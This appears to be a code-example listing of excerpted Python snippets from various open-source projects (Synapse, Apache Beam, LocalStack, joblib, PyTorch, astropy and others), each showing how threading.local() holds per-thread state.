        settings_dict:  like settings.SADABASES['salesforce'] in Django
        alias:          important if the authentication should be shared for more thread
        errorhandler: function with following signature
            ``errorhandler(connection, cursor, errorclass, errorvalue)``
        use_introspection: bool
    """
    # pylint:disable=too-many-instance-attributes

    Error = Error
    InterfaceError = InterfaceError
Example #49
0
import os
import threading
from textwrap import wrap
from typing import Any, Iterator, Optional, TextIO, Union

import rich
import rich.box
import rich.console
import rich.rule
import rich.segment
import rich.table
import rich.text

from flexget.options import ArgumentParser

local_context = threading.local()


class _Console(rich.console.Console):
    def __init__(self, *args, **kwargs):
        if "PYCHARM_HOSTED" in os.environ:
            kwargs.setdefault('color_system', 'truecolor')
        super().__init__(*args, **kwargs)

    def __call__(self, text: Any, *args, **kwargs) -> None:
        """
        Print to console safely. Output is able to be captured by different streams in different contexts.

        Any plugin wishing to output to the user's console should use this function instead of print so that
        output can be redirected when FlexGet is invoked from another process.
Example #50
0
def _setup_stdlib_logging(config: "HomeServerConfig",
                          log_config_path: Optional[str],
                          logBeginner: LogBeginner) -> None:
    """
    Set up Python standard library logging.
    """
    if log_config_path is None:
        log_format = (
            "%(asctime)s - %(name)s - %(lineno)d - %(levelname)s - %(request)s"
            " - %(message)s")

        logger = logging.getLogger("")
        logger.setLevel(logging.INFO)
        logging.getLogger("synapse.storage.SQL").setLevel(logging.INFO)

        formatter = logging.Formatter(log_format)

        handler = logging.StreamHandler()
        handler.setFormatter(formatter)
        logger.addHandler(handler)
    else:
        # Load the logging configuration.
        _load_logging_config(log_config_path)

    # We add a log record factory that runs all messages through the
    # LoggingContextFilter so that we get the context *at the time we log*
    # rather than when we write to a handler. This can be done in config using
    # filter options, but care must when using e.g. MemoryHandler to buffer
    # writes.

    log_context_filter = LoggingContextFilter()
    log_metadata_filter = MetadataFilter(
        {"server_name": config.server.server_name})
    old_factory = logging.getLogRecordFactory()

    def factory(*args: Any, **kwargs: Any) -> logging.LogRecord:
        record = old_factory(*args, **kwargs)
        log_context_filter.filter(record)
        log_metadata_filter.filter(record)
        return record

    logging.setLogRecordFactory(factory)

    # Route Twisted's native logging through to the standard library logging
    # system.
    observer = STDLibLogObserver()

    threadlocal = threading.local()

    @implementer(ILogObserver)
    def _log(event: dict) -> None:
        if "log_text" in event:
            if event["log_text"].startswith(
                    "DNSDatagramProtocol starting on "):
                return

            if event["log_text"].startswith("(UDP Port "):
                return

            if event["log_text"].startswith("Timing out client"):
                return

        # this is a workaround to make sure we don't get stack overflows when the
        # logging system raises an error which is written to stderr which is redirected
        # to the logging system, etc.
        if getattr(threadlocal, "active", False):
            # write the text of the event, if any, to the *real* stderr (which may
            # be redirected to /dev/null, but there's not much we can do)
            try:
                event_text = eventAsText(event)
                print("logging during logging: %s" % event_text,
                      file=sys.__stderr__)
            except Exception:
                # gah.
                pass
            return

        try:
            threadlocal.active = True
            return observer(event)
        finally:
            threadlocal.active = False

    logBeginner.beginLoggingTo([_log], redirectStandardIO=False)
Example #51
0
import threading
import traceback

from .signal import Signal

local_tasks = threading.local()


class TaskFailure(Exception):
    def __init__(self, message):
        Exception.__init__(self, message)
        self.message = message


class TaskStopped(Exception):
    def __init__(self):
        Exception.__init__(self)


class Task(object):
    Failure = TaskFailure
    Stopped = TaskStopped

    def __init__(self, name: str) -> None:
        self.__name = name
        self.stop_flag = False
        self.started = Signal()
        self.succeeded = Signal()
        self.progressed = Signal()
        self.failed = Signal()
        self.stopped = Signal()
Example #52
0
class PredictionDoFn(beam.DoFn):
  """A DoFn class loading the model to create session and performing prediction.

  The input PCollection consists of a list of strings from the input files.

  The DoFn first loads model from a given path where meta graph data and
  checkpoint data are exported to. Then if the there is only one string input
  tensor or the model needs to preprocess the input, it directly passes the
  data to prediction. Otherwise, it tries to load the data into JSON.

  Then it batches the inputs of each instance into one feed_dict. After that, it
  runs session and predicts the interesting values for all the instances.
  Finally it emits the prediction result for each individual instance.
  """

  class _ModelState(object):
    """Atomic representation of the in-memory state of the model."""

    def __init__(self, model_dir, skip_preprocessing):
      self.model_dir = model_dir

      session, signature = mlprediction.load_model(model_dir)
      client = mlprediction.SessionClient(session, signature)
      self.model = mlprediction.DefaultModel.from_client(
          client, model_dir, skip_preprocessing=skip_preprocessing)

  # TODO(b/33746781): Get rid of this and instead use self._model_state for
  # all initialization detection.
  _thread_local = threading.local()

  def __init__(self, aggregator_dict=None, cloud_logger=None,
               skip_preprocessing=False,
               target="", config=None):
    """Constructor of Prediction beam.DoFn class.

    Args:
      aggregator_dict: A dict of aggregators containing maps from counter name
                       to the aggregator.
      cloud_logger: The cloud logging client to send logs to.
      skip_preprocessing: bool whether to skip preprocessing even when
                          the metadata.yaml/metadata.json file exists.
      target: The execution engine to connect to. See target in tf.Session(). In
              most cases, users should not set the target.
      config: A ConfigProto proto with configuration options. See config in
              tf.Session()

    Side Inputs:
      model_dir: The directory containing the model to load and the
                 checkpoint files to restore the session.
    """
    self._target = target
    self._skip_preprocessing = skip_preprocessing
    self._config = config
    self._aggregator_dict = aggregator_dict
    self._cloud_logger = cloud_logger
    self._model_state = None

    # Metrics.
    self._model_load_seconds_distribution = beam.metrics.Metrics.distribution(
        self.__class__, "model_load_seconds")

  def _create_snippet(self, input_data):
    """Truncate the input data to create a snippet."""
    try:
      input_snippet = "\n".join(str(x) for x in input_data)
      return unicode(input_snippet[:LOG_SIZE_LIMIT], errors="replace")
    except Exception:  # pylint: disable=broad-except
      logging.warning("Failed to create snippet from input: [%s].",
                      traceback.format_exc())
      return "Input snippet is unavailable."

  # TODO(user): Remove the try catch after sdk update
  def process(self, element, model_dir):
    try:
      element = element.element
    except AttributeError:
      pass

    try:
      if self._model_state is None:
        if (getattr(self._thread_local, "model_state", None) is None or
            self._thread_local.model_state.model_dir != model_dir):
          start = datetime.datetime.now()
          self._thread_local.model_state = self._ModelState(
              model_dir, self._skip_preprocessing)
          self._model_load_seconds_distribution.update(
              int((datetime.datetime.now() - start).total_seconds()))
        self._model_state = self._thread_local.model_state
      else:
        assert self._model_state.model_dir == model_dir

      # Try to load it.
      if (self._model_state.model.is_single_string_input() or
          self._model_state.model.need_preprocess()):
        loaded_data = element
      else:
        loaded_data = [json.loads(d) for d in element]
      instances = mlprediction.decode_base64(loaded_data)
      inputs, predictions = self._model_state.model.predict(instances)
      predictions = list(predictions)
      predictions = mlprediction.encode_base64(
          predictions,
          self._model_state.model.outputs_type_map())

      if self._aggregator_dict:
        aggr = self._aggregator_dict.get(
            aggregators.AggregatorName.ML_PREDICTIONS, None)
        if aggr:
          aggr.inc(len(predictions))

      for i, p in zip(inputs, predictions):
        yield i, p

    except mlprediction.PredictionError as e:
      logging.error("Got a known exception: [%s]\n%s", e.error_message,
                    traceback.format_exc())
      if self._cloud_logger:
        # TODO(user): consider to write a sink to buffer the logging events. It
        # also eliminates the restarting/duplicated running issue.
        self._cloud_logger.write_error_message(
            e.error_message, self._create_snippet(element))
      # reraise failure to load model as permanent exception to end dataflow job
      if e.error_code == mlprediction.PredictionError.FAILED_TO_LOAD_MODEL:
        raise beam.utils.retry.PermanentException(e.error_message)
      yield beam.pvalue.SideOutputValue("errors",
                                        (e.error_message, element))

    except Exception as e:  # pylint: disable=broad-except
      logging.error("Got an unknown exception: [%s].", traceback.format_exc())
      if self._cloud_logger:
        self._cloud_logger.write_error_message(
            str(e), self._create_snippet(element))
      yield beam.pvalue.SideOutputValue("errors", (str(e), element))
class ProxyListenerDynamoDB(ProxyListener):
    thread_local = threading.local()

    def __init__(self):
        self._table_ttl_map = {}

    def forward_request(self, method, path, data, headers):
        if path.startswith('/shell'):
            return True
        data = json.loads(to_str(data))
        ddb_client = aws_stack.connect_to_service('dynamodb')

        if random.random() < config.DYNAMODB_ERROR_PROBABILITY:
            return error_response_throughput()

        action = headers.get('X-Amz-Target')
        if action == '%s.CreateTable' % ACTION_PREFIX:
            # Check if table exists, to avoid error log output from DynamoDBLocal
            table_names = ddb_client.list_tables()['TableNames']
            if to_str(data['TableName']) in table_names:
                return 200
        elif action in ('%s.PutItem' % ACTION_PREFIX,
                        '%s.UpdateItem' % ACTION_PREFIX,
                        '%s.DeleteItem' % ACTION_PREFIX):
            # find an existing item and store it in a thread-local, so we can access it in return_response,
            # in order to determine whether an item already existed (MODIFY) or not (INSERT)
            ProxyListenerDynamoDB.thread_local.existing_item = find_existing_item(
                data)
        elif action == '%s.DescribeTable' % ACTION_PREFIX:
            # Check if table exists, to avoid error log output from DynamoDBLocal
            table_names = ddb_client.list_tables()['TableNames']
            if to_str(data['TableName']) not in table_names:
                response = error_response(
                    message='Cannot do operations on a non-existent table',
                    error_type='ResourceNotFoundException')
                fix_headers_for_updated_response(response)
                return response
        elif action == '%s.DeleteTable' % ACTION_PREFIX:
            # Check if table exists, to avoid error log output from DynamoDBLocal
            table_names = ddb_client.list_tables()['TableNames']
            if to_str(data['TableName']) not in table_names:
                response = error_response(
                    message='Cannot do operations on a non-existent table',
                    error_type='ResourceNotFoundException')
                fix_headers_for_updated_response(response)
                return response
        elif action == '%s.BatchWriteItem' % ACTION_PREFIX:
            existing_items = []
            for table_name in sorted(data['RequestItems'].keys()):
                for request in data['RequestItems'][table_name]:
                    for key in ['PutRequest', 'DeleteRequest']:
                        inner_request = request.get(key)
                        if inner_request:
                            existing_items.append(
                                find_existing_item(inner_request, table_name))
            ProxyListenerDynamoDB.thread_local.existing_items = existing_items
        elif action == '%s.TransactWriteItems' % ACTION_PREFIX:
            existing_items = []
            for item in data['TransactItems']:
                for key in ['Put', 'Update', 'Delete']:
                    inner_item = item.get(key)
                    if inner_item:
                        existing_items.append(find_existing_item(inner_item))
            ProxyListenerDynamoDB.thread_local.existing_items = existing_items
        elif action == '%s.UpdateTimeToLive' % ACTION_PREFIX:
            # TODO: TTL status is maintained/mocked but no real expiry is happening for items
            response = Response()
            response.status_code = 200
            self._table_ttl_map[data['TableName']] = {
                'AttributeName':
                data['TimeToLiveSpecification']['AttributeName'],
                'Status': data['TimeToLiveSpecification']['Enabled']
            }
            response._content = json.dumps(
                {'TimeToLiveSpecification': data['TimeToLiveSpecification']})
            fix_headers_for_updated_response(response)
            return response
        elif action == '%s.DescribeTimeToLive' % ACTION_PREFIX:
            response = Response()
            response.status_code = 200
            if data['TableName'] in self._table_ttl_map:
                if self._table_ttl_map[data['TableName']]['Status']:
                    ttl_status = 'ENABLED'
                else:
                    ttl_status = 'DISABLED'
                response._content = json.dumps({
                    'TimeToLiveDescription': {
                        'AttributeName':
                        self._table_ttl_map[data['TableName']]
                        ['AttributeName'],
                        'TimeToLiveStatus':
                        ttl_status
                    }
                })
            else:  # TTL for dynamodb table not set
                response._content = json.dumps({
                    'TimeToLiveDescription': {
                        'TimeToLiveStatus': 'DISABLED'
                    }
                })
            fix_headers_for_updated_response(response)
            return response
        elif action == '%s.TagResource' % ACTION_PREFIX or action == '%s.UntagResource' % ACTION_PREFIX:
            response = Response()
            response.status_code = 200
            response._content = ''  # returns an empty body on success.
            fix_headers_for_updated_response(response)
            return response
        elif action == '%s.ListTagsOfResource' % ACTION_PREFIX:
            response = Response()
            response.status_code = 200
            response._content = json.dumps({
                'Tags': []
            })  # TODO: mocked and returns an empty list of tags for now.
            fix_headers_for_updated_response(response)
            return response

        return True

    def return_response(self, method, path, data, headers, response):
        if path.startswith('/shell'):
            return
        data = json.loads(to_str(data))

        # update table definitions
        if data and 'TableName' in data and 'KeySchema' in data:
            TABLE_DEFINITIONS[data['TableName']] = data

        if response._content:
            # fix the table and latest stream ARNs (DynamoDBLocal hardcodes "ddblocal" as the region)
            content_replaced = re.sub(
                r'("TableArn"|"LatestStreamArn"|"StreamArn")\s*:\s*"arn:aws:dynamodb:'
                + 'ddblocal:([^"]+)"',
                r'\1: "arn:aws:dynamodb:%s:\2"' % aws_stack.get_local_region(),
                to_str(response._content))
            if content_replaced != response._content:
                response._content = content_replaced
                fix_headers_for_updated_response(response)

        action = headers.get('X-Amz-Target')
        if not action:
            return

        record = {
            'eventID': '1',
            'eventVersion': '1.0',
            'dynamodb': {
                'StreamViewType': 'NEW_AND_OLD_IMAGES',
                'SizeBytes': -1
            },
            'awsRegion': config.DEFAULT_REGION,
            'eventSource': 'aws:dynamodb'
        }
        records = [record]

        if action == '%s.UpdateItem' % ACTION_PREFIX:
            if response.status_code == 200:
                updated_item = find_existing_item(data)
                if not updated_item:
                    return
                record['eventName'] = 'MODIFY'
                record['dynamodb']['Keys'] = data['Key']
                record['dynamodb']['OldImage'] = self._thread_local(
                    'existing_item')
                record['dynamodb']['NewImage'] = updated_item
                record['dynamodb']['SizeBytes'] = len(json.dumps(updated_item))
        elif action == '%s.BatchWriteItem' % ACTION_PREFIX:
            records = self.prepare_batch_write_item_records(record, data)
        elif action == '%s.TransactWriteItems' % ACTION_PREFIX:
            records = self.prepare_transact_write_item_records(record, data)
        elif action == '%s.PutItem' % ACTION_PREFIX:
            if response.status_code == 200:
                existing_item = self._thread_local('existing_item')
                record[
                    'eventName'] = 'INSERT' if not existing_item else 'MODIFY'
                keys = dynamodb_extract_keys(item=data['Item'],
                                             table_name=data['TableName'])
                if isinstance(keys, Response):
                    return keys
                record['dynamodb']['Keys'] = keys
                record['dynamodb']['NewImage'] = data['Item']
                record['dynamodb']['SizeBytes'] = len(json.dumps(data['Item']))
                if existing_item:
                    record['dynamodb']['OldImage'] = existing_item
        elif action == '%s.GetItem' % ACTION_PREFIX:
            if response.status_code == 200:
                content = json.loads(to_str(response.content))
                # make sure we append 'ConsumedCapacity', which is properly
                # returned by dynalite, but not by AWS's DynamoDBLocal
                if 'ConsumedCapacity' not in content and data.get(
                        'ReturnConsumedCapacity') in ('TOTAL', 'INDEXES'):
                    content['ConsumedCapacity'] = {
                        'CapacityUnits': 0.5,  # TODO hardcoded
                        'TableName': data['TableName']
                    }
                    response._content = json.dumps(content)
                    fix_headers_for_updated_response(response)
        elif action == '%s.DeleteItem' % ACTION_PREFIX:
            if response.status_code == 200:
                old_item = self._thread_local('existing_item')
                record['eventName'] = 'REMOVE'
                record['dynamodb']['Keys'] = data['Key']
                record['dynamodb']['OldImage'] = old_item
        elif action == '%s.CreateTable' % ACTION_PREFIX:
            if 'StreamSpecification' in data:
                create_dynamodb_stream(data)
            event_publisher.fire_event(
                event_publisher.EVENT_DYNAMODB_CREATE_TABLE,
                payload={'n': event_publisher.get_hash(data['TableName'])})
            return
        elif action == '%s.DeleteTable' % ACTION_PREFIX:
            event_publisher.fire_event(
                event_publisher.EVENT_DYNAMODB_DELETE_TABLE,
                payload={'n': event_publisher.get_hash(data['TableName'])})
            return
        elif action == '%s.UpdateTable' % ACTION_PREFIX:
            if 'StreamSpecification' in data:
                create_dynamodb_stream(data)
            return
        else:
            # nothing to do
            return

        if len(records) > 0 and 'eventName' in records[0]:
            if 'TableName' in data:
                records[0]['eventSourceARN'] = aws_stack.dynamodb_table_arn(
                    data['TableName'])
            forward_to_lambda(records)
            forward_to_ddb_stream(records)

    def prepare_batch_write_item_records(self, record, data):
        records = []
        i = 0
        for table_name in sorted(data['RequestItems'].keys()):
            for request in data['RequestItems'][table_name]:
                put_request = request.get('PutRequest')
                if put_request:
                    existing_item = self._thread_local('existing_items')[i]
                    keys = dynamodb_extract_keys(item=put_request['Item'],
                                                 table_name=table_name)
                    if isinstance(keys, Response):
                        return keys
                    new_record = clone(record)
                    new_record[
                        'eventName'] = 'INSERT' if not existing_item else 'MODIFY'
                    new_record['dynamodb']['Keys'] = keys
                    new_record['dynamodb']['NewImage'] = put_request['Item']
                    if existing_item:
                        new_record['dynamodb']['OldImage'] = existing_item
                    new_record[
                        'eventSourceARN'] = aws_stack.dynamodb_table_arn(
                            table_name)
                    records.append(new_record)
                delete_request = request.get('DeleteRequest')
                if delete_request:
                    keys = delete_request['Key']
                    if isinstance(keys, Response):
                        return keys
                    new_record = clone(record)
                    new_record['eventName'] = 'REMOVE'
                    new_record['dynamodb']['Keys'] = keys
                    new_record['dynamodb']['OldImage'] = self._thread_local(
                        'existing_items')[i]
                    new_record[
                        'eventSourceARN'] = aws_stack.dynamodb_table_arn(
                            table_name)
                    records.append(new_record)
                i += 1
        return records

    def prepare_transact_write_item_records(self, record, data):
        records = []
        for i, request in enumerate(data['TransactItems']):
            put_request = request.get('Put')
            if put_request:
                existing_item = self._thread_local('existing_items')[i]
                table_name = put_request['TableName']
                keys = dynamodb_extract_keys(item=put_request['Item'],
                                             table_name=table_name)
                if isinstance(keys, Response):
                    return keys
                new_record = clone(record)
                new_record[
                    'eventName'] = 'INSERT' if not existing_item else 'MODIFY'
                new_record['dynamodb']['Keys'] = keys
                new_record['dynamodb']['NewImage'] = put_request['Item']
                if existing_item:
                    new_record['dynamodb']['OldImage'] = existing_item
                new_record['eventSourceARN'] = aws_stack.dynamodb_table_arn(
                    table_name)
                records.append(new_record)
            update_request = request.get('Update')
            if update_request:
                table_name = update_request['TableName']
                keys = update_request['Key']
                if isinstance(keys, Response):
                    return keys
                updated_item = find_existing_item(update_request, table_name)
                if not updated_item:
                    return
                new_record = clone(record)
                new_record['eventName'] = 'MODIFY'
                new_record['dynamodb']['Keys'] = keys
                new_record['dynamodb']['OldImage'] = self._thread_local(
                    'existing_items')[i]
                new_record['dynamodb']['NewImage'] = updated_item
                new_record['eventSourceARN'] = aws_stack.dynamodb_table_arn(
                    table_name)
                records.append(new_record)
            delete_request = request.get('Delete')
            if delete_request:
                table_name = delete_request['TableName']
                keys = delete_request['Key']
                if isinstance(keys, Response):
                    return keys
                new_record = clone(record)
                new_record['eventName'] = 'REMOVE'
                new_record['dynamodb']['Keys'] = keys
                new_record['dynamodb']['OldImage'] = self._thread_local(
                    'existing_items')[i]
                new_record['eventSourceARN'] = aws_stack.dynamodb_table_arn(
                    table_name)
                records.append(new_record)
        return records

    def _thread_local(self, name, default=None):
        try:
            return getattr(ProxyListenerDynamoDB.thread_local, name)
        except AttributeError:
            return default
Example #54
0
from apache_beam.runners import common
from apache_beam.utils.counters import Counter
from apache_beam.utils.counters import CounterFactory
from apache_beam.utils.counters import CounterName

try:
    from apache_beam.runners.worker import statesampler_fast as statesampler_impl  # type: ignore
    FAST_SAMPLER = True
except ImportError:
    from apache_beam.runners.worker import statesampler_slow as statesampler_impl
    FAST_SAMPLER = False

if TYPE_CHECKING:
    from apache_beam.metrics.execution import MetricsContainer

_STATE_SAMPLERS = threading.local()


def set_current_tracker(tracker):
    _STATE_SAMPLERS.tracker = tracker


def get_current_tracker():
    try:
        return _STATE_SAMPLERS.tracker
    except AttributeError:
        return None


_INSTRUCTION_IDS = threading.local()
Example #55
0
 def __init__(self, *args):
   self._thread_local = threading.local()
   super(MockOsEnv, self).__init__(*args)
Example #56
0
# BruteBuster by Cyber Security Consulting (www.csc.bg)
"""
Brutebuster needs access to the REMOTE_IP of the incoming request. We're doing
this by adding the request object to the thread_local space
"""

try:
    from threading import local
except ImportError:
    from django.utils.threading_local import local

_thread_locals = local()


def get_request():
    return getattr(_thread_locals, 'request', None)


class RequestMiddleware(object):
    """Provides access to the request object via thread locals"""
    def __init__(self, get_response):
        self.get_response = get_response
        # One-time configuration and initialization.

    def __call__(self, request):
        _thread_locals.request = request
        # Code to be executed for each request before
        # the view (and later middleware) are called.

        response = self.get_response(request)
Example #57
0
class Registry(object):
    """Holds all registered properties and their various overrides."""
    registered = {}
    test_overrides = {}
    db_items = {}
    db_overrides = {}
    names_with_draft = {}
    last_update_time = 0
    update_index = 0
    threadlocal = threading.local()
    REENTRY_ATTR_NAME = 'busy'

    @classmethod
    def get_overrides(cls, force_update=False):
        """Returns current property overrides, maybe cached."""

        now = long(time.time())
        age = now - cls.last_update_time
        max_age = UPDATE_INTERVAL_SEC.get_value(db_overrides=cls.db_overrides)

        # do not update if call is reentrant or outer db transaction exists
        busy = hasattr(cls.threadlocal,
                       cls.REENTRY_ATTR_NAME) or (db.is_in_transaction())

        if (not busy) and (force_update or age < 0 or age >= max_age):
            # Value of '0' disables all datastore overrides.
            if UPDATE_INTERVAL_SEC.get_value() == 0:
                cls.db_overrides = {}
                return cls.db_overrides

            # Load overrides from a datastore.
            setattr(cls.threadlocal, cls.REENTRY_ATTR_NAME, True)
            try:
                old_namespace = namespace_manager.get_namespace()
                try:
                    namespace_manager.set_namespace(
                        appengine_config.DEFAULT_NAMESPACE_NAME)
                    cls._load_from_db()
                finally:
                    namespace_manager.set_namespace(old_namespace)
            except Exception as e:  # pylint: disable=broad-except
                logging.error('Failed to load properties from a database: %s.',
                              str(e))
            finally:
                delattr(cls.threadlocal, cls.REENTRY_ATTR_NAME)

                # Avoid overload and update timestamp even if we failed.
                cls.last_update_time = now
                cls.update_index += 1

        return cls.db_overrides

    @classmethod
    def _load_from_db(cls):
        """Loads dynamic properties from db."""
        items = {}
        overrides = {}
        drafts = set()
        for item in ConfigPropertyEntity.all().fetch(1000):
            items[item.key().name()] = item
            cls._set_value(item, overrides, drafts)
        cls.db_items = items
        cls.db_overrides = overrides
        cls.names_with_draft = drafts

    @classmethod
    def _config_property_entity_changed(cls, item):
        cls._set_value(item, cls.db_overrides, cls.names_with_draft)

    @classmethod
    def _set_value(cls, item, overrides, drafts):
        name = item.key().name()
        target = cls.registered.get(name, None)
        if not target:
            logging.warning('Property is not registered (skipped): %s', name)
            return

        if item.is_draft:
            if name in overrides:
                del overrides[name]
            drafts.add(name)
        else:
            if name in drafts:
                drafts.remove(name)

            # Enforce value type.
            try:
                value = transforms.string_to_value(item.value,
                                                   target.value_type)
            except Exception:  # pylint: disable=broad-except
                logging.error(
                    'Property %s failed to cast to a type %s; removing.',
                    target.name, target.value_type)
                return

            # Enforce value validator.
            if target.validator:
                errors = []
                try:
                    target.validator(value, errors)
                except Exception as e:  # pylint: disable=broad-except
                    errors.append('Error validating property %s.\n%s',
                                  (target.name, e))
                if errors:
                    logging.error('Property %s has invalid value:\n%s',
                                  target.name, '\n'.join(errors))
                    return

            overrides[name] = value
Example #58
0
BACKENDS = {
    'multiprocessing': MultiprocessingBackend,
    'threading': ThreadingBackend,
    'sequential': SequentialBackend,
    'loky': LokyBackend,
}

# name of the backend used by default by Parallel outside of any context
# managed by ``parallel_backend``.
DEFAULT_BACKEND = 'loky'
DEFAULT_N_JOBS = 1
DEFAULT_THREAD_BACKEND = 'threading'

# Thread local value that can be overridden by the ``parallel_backend`` context
# manager
_backend = threading.local()

VALID_BACKEND_HINTS = ('processes', 'threads', None)
VALID_BACKEND_CONSTRAINTS = ('sharedmem', None)


def get_active_backend(prefer=None, require=None, verbose=0):
    """Return the active default backend"""
    if prefer not in VALID_BACKEND_HINTS:
        raise ValueError("prefer=%r is not a valid backend hint, "
                         "expected one of %r" % (prefer, VALID_BACKEND_HINTS))
    if require not in VALID_BACKEND_CONSTRAINTS:
        raise ValueError("require=%r is not a valid backend constraint, "
                         "expected one of %r" %
                         (require, VALID_BACKEND_CONSTRAINTS))
Example #59
0
import os
import torch
import traceback
import warnings
import threading
from torch._six import raise_from
from ._utils import _get_device_index
import torch._C

try:
    from torch._C import _cudart
except ImportError:
    _cudart = None

_initialized = False
_tls = threading.local()
_initialization_lock = threading.Lock()
_queued_calls = []  # don't invoke these until initialization occurs
_is_in_bad_fork = getattr(torch._C, "_cuda_isInBadFork", lambda: False)


def is_available():
    r"""Returns a bool indicating if CUDA is currently available."""
    if (not hasattr(torch._C, '_cuda_isDriverSufficient')
            or not torch._C._cuda_isDriverSufficient()):
        return False
    return torch._C._cuda_getDeviceCount() > 0


def _sleep(cycles):
    torch._C._cuda_sleep(cycles)
Example #60
0
class _AngleParser:
    """
    Parses the various angle formats including:

       * 01:02:30.43 degrees
       * 1 2 0 hours
       * 1°2′3″
       * 1d2m3s
       * -1h2m3s
       * 1°2′3″N

    This class should not be used directly.  Use `parse_angle`
    instead.
    """
    # For safe multi-threaded operation all class (but not instance)
    # members that carry state should be thread-local. They are stored
    # in the following class member
    _thread_local = threading.local()

    def __init__(self):
        # TODO: in principle, the parser should be invalidated if we change unit
        # system (from CDS to FITS, say).  Might want to keep a link to the
        # unit_registry used, and regenerate the parser/lexer if it changes.
        # Alternatively, perhaps one should not worry at all and just pre-
        # generate the parser for each release (as done for unit formats).
        # For some discussion of this problem, see
        # https://github.com/astropy/astropy/issues/5350#issuecomment-248770151
        if '_parser' not in _AngleParser._thread_local.__dict__:
            (_AngleParser._thread_local._parser,
             _AngleParser._thread_local._lexer) = self._make_parser()

    @classmethod
    def _get_simple_unit_names(cls):
        simple_units = set(
            u.radian.find_equivalent_units(include_prefix_units=True))
        simple_unit_names = set()
        # We filter out degree and hourangle, since those are treated
        # separately.
        for unit in simple_units:
            if unit != u.deg and unit != u.hourangle:
                simple_unit_names.update(unit.names)
        return sorted(simple_unit_names)

    @classmethod
    def _make_parser(cls):
        from astropy.extern.ply import lex, yacc

        # List of token names.
        tokens = (
            'SIGN',
            'UINT',
            'UFLOAT',
            'COLON',
            'DEGREE',
            'HOUR',
            'MINUTE',
            'SECOND',
            'SIMPLE_UNIT',
            'EASTWEST',
            'NORTHSOUTH'
        )

        # NOTE THE ORDERING OF THESE RULES IS IMPORTANT!!
        # Regular expression rules for simple tokens
        def t_UFLOAT(t):
            r'((\d+\.\d*)|(\.\d+))([eE][+-−]?\d+)?'
            # The above includes Unicode "MINUS SIGN" \u2212.  It is
            # important to include the hyphen last, or the regex will
            # treat this as a range.
            t.value = float(t.value.replace('−', '-'))
            return t

        def t_UINT(t):
            r'\d+'
            t.value = int(t.value)
            return t

        def t_SIGN(t):
            r'[+−-]'
            # The above include Unicode "MINUS SIGN" \u2212.  It is
            # important to include the hyphen last, or the regex will
            # treat this as a range.
            if t.value == '+':
                t.value = 1.0
            else:
                t.value = -1.0
            return t

        def t_EASTWEST(t):
            r'[EW]$'
            t.value = -1.0 if t.value == 'W' else 1.0
            return t

        def t_NORTHSOUTH(t):
            r'[NS]$'
            # We cannot use lower-case letters otherwise we'll confuse
            # s[outh] with s[econd]
            t.value = -1.0 if t.value == 'S' else 1.0
            return t

        def t_SIMPLE_UNIT(t):
            t.value = u.Unit(t.value)
            return t

        t_SIMPLE_UNIT.__doc__ = '|'.join(
            f'(?:{x})' for x in cls._get_simple_unit_names())

        t_COLON = ':'
        t_DEGREE = r'd(eg(ree(s)?)?)?|°'
        t_HOUR = r'hour(s)?|h(r)?|ʰ'
        t_MINUTE = r'm(in(ute(s)?)?)?|′|\'|ᵐ'
        t_SECOND = r's(ec(ond(s)?)?)?|″|\"|ˢ'

        # A string containing ignored characters (spaces)
        t_ignore = ' '

        # Error handling rule
        def t_error(t):
            raise ValueError(
                f"Invalid character at col {t.lexpos}")

        lexer = parsing.lex(lextab='angle_lextab', package='astropy/coordinates')

        def p_angle(p):
            '''
            angle : sign hms eastwest
                  | sign dms dir
                  | sign arcsecond dir
                  | sign arcminute dir
                  | sign simple dir
            '''
            sign = p[1] * p[3]
            value, unit = p[2]
            if isinstance(value, tuple):
                p[0] = ((sign * value[0],) + value[1:], unit)
            else:
                p[0] = (sign * value, unit)

        def p_sign(p):
            '''
            sign : SIGN
                 |
            '''
            if len(p) == 2:
                p[0] = p[1]
            else:
                p[0] = 1.0

        def p_eastwest(p):
            '''
            eastwest : EASTWEST
                     |
            '''
            if len(p) == 2:
                p[0] = p[1]
            else:
                p[0] = 1.0

        def p_dir(p):
            '''
            dir : EASTWEST
                | NORTHSOUTH
                |
            '''
            if len(p) == 2:
                p[0] = p[1]
            else:
                p[0] = 1.0

        def p_ufloat(p):
            '''
            ufloat : UFLOAT
                   | UINT
            '''
            p[0] = p[1]

        def p_colon(p):
            '''
            colon : UINT COLON ufloat
                  | UINT COLON UINT COLON ufloat
            '''
            if len(p) == 4:
                p[0] = (p[1], p[3])
            elif len(p) == 6:
                p[0] = (p[1], p[3], p[5])

        def p_spaced(p):
            '''
            spaced : UINT ufloat
                   | UINT UINT ufloat
            '''
            if len(p) == 3:
                p[0] = (p[1], p[2])
            elif len(p) == 4:
                p[0] = (p[1], p[2], p[3])

        def p_generic(p):
            '''
            generic : colon
                    | spaced
                    | ufloat
            '''
            p[0] = p[1]

        def p_hms(p):
            '''
            hms : UINT HOUR
                | UINT HOUR ufloat
                | UINT HOUR UINT MINUTE
                | UINT HOUR UFLOAT MINUTE
                | UINT HOUR UINT MINUTE ufloat
                | UINT HOUR UINT MINUTE ufloat SECOND
                | generic HOUR
            '''
            if len(p) == 3:
                p[0] = (p[1], u.hourangle)
            elif len(p) in (4, 5):
                p[0] = ((p[1], p[3]), u.hourangle)
            elif len(p) in (6, 7):
                p[0] = ((p[1], p[3], p[5]), u.hourangle)

        def p_dms(p):
            '''
            dms : UINT DEGREE
                | UINT DEGREE ufloat
                | UINT DEGREE UINT MINUTE
                | UINT DEGREE UFLOAT MINUTE
                | UINT DEGREE UINT MINUTE ufloat
                | UINT DEGREE UINT MINUTE ufloat SECOND
                | generic DEGREE
            '''
            if len(p) == 3:
                p[0] = (p[1], u.degree)
            elif len(p) in (4, 5):
                p[0] = ((p[1], p[3]), u.degree)
            elif len(p) in (6, 7):
                p[0] = ((p[1], p[3], p[5]), u.degree)

        def p_simple(p):
            '''
            simple : generic
                   | generic SIMPLE_UNIT
            '''
            if len(p) == 2:
                p[0] = (p[1], None)
            else:
                p[0] = (p[1], p[2])

        def p_arcsecond(p):
            '''
            arcsecond : generic SECOND
            '''
            p[0] = (p[1], u.arcsecond)

        def p_arcminute(p):
            '''
            arcminute : generic MINUTE
            '''
            p[0] = (p[1], u.arcminute)

        def p_error(p):
            raise ValueError

        parser = parsing.yacc(tabmodule='angle_parsetab', package='astropy/coordinates')

        return parser, lexer

    def parse(self, angle, unit, debug=False):
        try:
            found_angle, found_unit = self._thread_local._parser.parse(
                angle, lexer=self._thread_local._lexer, debug=debug)
        except ValueError as e:
            if str(e):
